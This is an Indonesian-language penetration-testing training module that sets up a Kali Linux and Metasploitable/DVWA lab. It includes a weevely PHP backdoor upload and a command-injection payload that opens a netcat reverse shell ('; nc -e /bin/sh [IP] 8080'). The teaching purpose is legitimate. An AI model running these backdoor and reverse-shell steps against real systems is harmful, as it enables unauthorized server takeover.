Anda di halaman 1dari 11

BAB 1

Pengenalan Dasar

1.1 Penetration Testing


Penetration testing adalah suatu kegiatan dimana seseorang atau sekelompok orang
mensimulasikan serangan yang bisa dilakukan terhadap suatu jaringan atau sistem suatu
organisasi atau perusahaan untuk menemukan celah kerentanan dalam sistem tersebut.
Penetration test juga merupakan salah satu komponen penting dari Security Audit. Adapun
tahap-tahap yang dilakukan adalah sebagai berikut;
a. Perencanaan
Di tahap ini dilakukan perencanaan yang meliputi ruang lingkup pentest, waktu
pelaksanaan, susunan tim, dan lain-lain.
b. Information Gathering
Adalah tahap untuk mengumpulkan berbagai informasi mengenai target. ada banyak
alat bantu yang bisa digunakan seperti netcraft.com dan robtex.com. kemudian
dilakukan network survey untuk mengumpulkan informasi domain, ip address, host
dengan bantuan tools seperti Nmap.
c. Vulnerability Detection
Setelah mengetahui informasi tentang sistem, kemudian dilakuakn pencarian celah
keamanan baik secara manual maupun otomatis menggunakan tools semisal
Nessus atau OWASP
d. Penetration Attempt
Setelah berhasil mendapatkan celah keamanan, tahap selanjutnya adalah
percobaan penyerangan sesuai dengan vulnerability yang ditemukan.
e. Analisis dan Penyusunan Laporan
Adalah proses analisis dan penyusunan laporan mengenai proses penetration testing
yang telah dilakukan dan hasil yang didapat serta usulan perbaikan. Tahap
selanjutnya adalah tindak lanjut yang dilakukan bersama-sama dengan pengembang
dan admin untuk memperbaiki keamanan sistem.

1.2 Pengenalan Tools yang digunakan


Pada pelatihan ini akan menggunakan tiga software yang perlu diinstall pada
komputer dan beberapa tautan website yang berguna untuk mengumpulkan informasi suatu
sistem yang meliputi ip address, teknologi yang digunakan, pemilik domain, dan lain-lain.
Tautan tersebut antara lain;
a. sitereport.netcraft.com
adalah website yang biasa digunakan untuk mengetahui background website,
network, dan teknologi yang digunakan oleh website.
b. whois.domaintools.com
untuk mengetahui informasi pemilik website yang akan diserang.
c. robtex.com
untuk mendapatkan informasi DNS dari website yang akan diserang.
Sedangkan tiga software yang akan digunakan untuk melakukan praktek penetration testing
adalah;
a. VMWare workstation player 16
Adalah software untuk menjalankan virtual machine, sehingga kita tidak perlu
menginstall OS baru pada komputer. Dapat diunduh pada tautan berikut;
https://www.vmware.com/products/workstation-player/workstation-player-
evaluation.html

b. Metasploitable
Adalah OS Linux yang dirancang sebagai target dalam latihan pentest kali ini. OS
tersebut sudah didesain dengan berbagai celah keamanan yang dapat kita serang
untuk mendapatkan kontrol sistem. Dapat diunduh pada tautan berikut:

https://sourceforge.net/projects/metasploitable/

Note: Untuk login metasploitable, username= msfadmin dan password= msfadmin

c. Kali Linux
Adalah salah satu distribution dari Linux yang lazim digunakan untuk melakukan
serangan siber ataupun security assessment. Sudah terinstall berbagai tools mulai
untuk Information Gathering hingga Post Exploitation.
https://zsecurity.org/download-custom-kali/

Note: Untuk login Kali Linux, username= root dan password= toor
BAB II
Information Gathering

Information gathering adalah tahap dimana informasi-informasi mengenai suatu website


dicari dan dikumpulkan. Informasi-informasi tersebut nantinya akan digunakan untuk
menemukan celah kerawanan yang dapat diserang dan disusupi. beberapa tools yang dapat
digunakan antara lain:

1. Whois Lookup (whois.domaintools.com)

2. Netcraft (sitereport.netcraft.com)

3. Robtex (robtex.com)
BAB III
File Upload Vulnerability

3.1 Pengertian
File Upload Vulnerability adalah salah satu celah keamanan yang memungkinkan
penyerang dapat mengunggah file berbahaya yang dapat memberi penyerang akses ke
server, memasang phising, dan lain-lain.

3.2 Praktek sederhana File Upload Vulnerability


1. Pastikan program metasploitable dan Kali Linux sudah terpasang di VMWare
Workstation Player 16 dan dapat dijalankan. Kemudian pada Kali Linux dapat
mengakses metasploitable dengan menginputkan ip address metasploitable pada
web browser. cara mengetahui ip address pada metasploitable adalah dengan
mengetik perintah “ifconfig” kemudian tekan enter

Pada gambar tersebut dapat diketahui bahwa ip addressnya adalah 192.168.47.129


2. Kemudian masukkan ip address tersebut pada browser
3. Kemudian kita akan memilih DVWA, login dengan username= admin dan password=
password, kemudian sesuaikan DVWA Security ke low atau rendah.

4. Kemudian di Kali Linux, kita akan membuat backdoor untuk diupload menggunakan
weevely, yang nantinya berguna sebagai ‘jalan masuk’ kita ke dalam sistem server.
caranya adalah dengan mengetikkan perintah
weevely generate [password] [namafile.php]

5. setelah itu kembali ke halaman DVWA, pilih menu file upload


6. Salin url yang muncul setelah file berhasil diunggah, lalu letakkan pada address bar
setelah [url]/dvwa/….

7. Jika sukses maka akan muncul tampilan putih tanpa ada pesan error

8. Salin URL tersebut, lalu kembali ke jendela Terminal lalu mengetikkan


weevely http://[url] [password]

9. Jika berhasil maka program weevely akan muncul, dan kita dapat mengetikkan
perintah uname -a untuk memastikan kita telah berada didalam server target

BAB IV
CODE EXECUTION VULNERABILITY
4.1 Pengetian
Code Execution Vulnerability adalah kondisi dimana output dari konten yang
disediakan server dapat dimanipulasi sehingga kita dapat membuat server mengeksekusi
kode-kode atau script yang kita buat tanpa harus menjadi administrator yang sah dari server
tersebut

4.2 Praktek Sederhana Kasus Code Execution Vulnerability


1. Buka kembali web DVWA pada browser, kemudian pilih menu command execution

2. Dalam linux, kita dapat memasukkan lebih dari 1 perintah dalam satu baris, dengan
menggunakan pemisah ‘;’ atau ‘|’. Bedanya adalah jika menggunakan ‘;’ maka hasil
dari seluruh perintah akan ditampilkan, sementara jika menggunakan ‘|’ maka hanya
perintah terakhir yang tampil, namun semua perintah tetap dieksekusi. Kali ini kita
akan mencoba untuk memasukkan perintah lain selain ping ip address, untuk
mengetes apakah server menerima perintah tersebut untuk dieksekusi.
3. Dari percobaan diatas, dapat diketahui bahwa terdapat celah code execution, dan
dapat kita manfaatkan untuk membangun akses ke server tersebut. kali ini tools yang
akan digunakan adalah netcat. pada Terminal Kali Linux, ketikkan perintah
nc -vv -l -p 8080 kemudian tekan enter.

4. Kemudian pada web DVWA menu Command Execution, masukkan perintah


[ipaddress]; nc -e /bin/sh [IPAddressKaliLinux] 8080
5. Jika berhasil,
dapat

memasukkan perintah-perintah yang akan dijalankan oleh server target

Anda mungkin juga menyukai